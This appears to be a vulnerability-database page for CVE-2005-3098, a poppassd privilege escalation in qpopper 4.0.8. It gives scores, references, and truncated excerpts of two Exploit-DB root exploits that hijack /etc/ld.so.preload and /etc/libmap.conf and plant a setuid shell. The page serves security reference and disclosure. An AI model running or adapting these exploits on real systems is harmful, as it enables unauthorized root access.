CVE-2005-3098
published 2005-09-28CVE-2005-3098: poppassd in Qualcomm qpopper 4.0.8 allows local users to modify arbitrary files and gain privileges via the -t (trace file) command line argument.
PriorityP419medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
0.58%
43.2th percentile
poppassd in Qualcomm qpopper 4.0.8 allows local users to modify arbitrary files and gain privileges via the -t (trace file) command line argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qualcomm | qpopper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation
exploitdb·2005-09-24
CVE-2005-3098 Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation
Qpopper 4.0.8 (Linux) - 'poppassd' Local Privilege Escalation
---
#!/bin/sh
# tested and working /str0ke
###########################################################################
# Linux Qpopper poppassd latest version local r00t exploit by kcope ###
# August 2005 ###
# Confidential - Keep Private! ###
###########################################################################
POPPASSD_PATH=/usr/local/bin/poppassd
echo ""
echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/ld.so.preload ]; then
echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
exit
fi
cat > program.c
#include
#include
#include
void _init()
{
if (!geteuid()) {
setgid(0);
setuid(0);
remove("/etc/ld.so.preload");
execl("/bin/sh","sh","-c","chown
Exploit-DB
Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation
exploitdb·2005-09-24
CVE-2005-3098 Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation
Qpopper 4.0.8 (FreeBSD) - Local Privilege Escalation
---
#!/bin/sh
###########################################################################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
# tested on FreeBSD 5.4-RELEASE ###
###########################################################################
POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4
echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c
#include
#include
#include
void _init()
{
if (!geteuid()) {
remove("/etc/libmap.conf");
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
No writeups or analysis indexed.
http://seclists.org/lists/fulldisclosure/2005/Sep/0652.htmlhttp://secunia.com/advisories/16935http://www.securityfocus.com/bid/14944http://www.vupen.com/english/advisories/2005/1844http://seclists.org/lists/fulldisclosure/2005/Sep/0652.htmlhttp://secunia.com/advisories/16935http://www.securityfocus.com/bid/14944http://www.vupen.com/english/advisories/2005/1844
2005-09-28
Published